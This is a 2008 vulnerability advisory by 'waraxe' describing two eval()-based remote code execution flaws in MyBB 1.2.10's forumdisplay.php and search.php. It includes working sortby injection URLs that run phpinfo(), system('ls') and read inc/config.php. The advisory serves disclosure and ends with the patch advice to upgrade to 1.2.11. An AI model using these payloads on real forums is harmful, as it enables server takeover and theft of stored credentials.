SecurityReason - Remote Code Execution in MyBB 1.2.10

Advisory Text :

[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10

========================================================================
=======

Author: Janek Vind "waraxe"

Independent discovery: koziolek

Date: 16. January 2008

Location: Estonia, Tartu

Web: http://www.waraxe.us/advisory-61.html

Target software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

MyBB is a discussion board that has been around for a while; it has
evolved

from other bulletin boards into the forum package it is today. Therefore,

it is a professional and efficient discussion board, developed by an
active

team of developers.

Vulnerabilities discovered

========================================================================
=======

1. Remote Code Execution in "forumdisplay.php":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Precondition: valid forum "fid" must be known.

Attacker doesn't need to have any privileges in mybb installation to be

successful in attack.

Proof-Of-Concept request:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='

... and we will see error message:

Parse error: syntax error, unexpected ''', expecting ']' in

C:apache_wwwrootmybb.1.2.10forumdisplay.php(407) : eval()'d code on line 1

Problematic piece of code is related to "eval()" function:

eval("$orderarrow['$sortby'] = "".

$templates->get("forumdisplay_orderarrow")."";");

Example attacks:

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/forumdisplay.php?fid=2

&sortby='];readfile('inc/config.php');exit;//

2. Remote Code Execution in "search.php":

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Precondition: search "sid" must be known - but that's trivial task.

Attacker doesn't need to have any privileges in mybb installation to be

successful in attack.

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='

Parse error: syntax error, unexpected ''', expecting ']' in

C:apache_wwwrootmybb.1.2.10search.php(141) : eval()'d code on line 1

Problematic is exactly same piece of code, as in previous case:

eval("$orderarrow['$sortby'] = "".

$templates->get("forumdisplay_orderarrow")."";");

Example attacks:

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='];phpinfo();exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='];system('ls');exit;//

http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid
here]

&sortby='];readfile('inc/config.php');exit;//

Both remote code execution security holes are very dangerous and can be

used by attacker to complete takeover the website and possible total

compromise of webserver.

How to fix:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Download MyBB new version 1.2.11 as soon as possible!

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb

and anyone else who know me!

Greetings to Raido Kerna. Tervitusi Torufoorumi rahvale!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]

Janek Vind "waraxe"

Homepage: http://www.janekvind.com/

Waraxe forum: http://www.waraxe.us/forums.html

---------------------------------- [ EOF ]
------------------------------------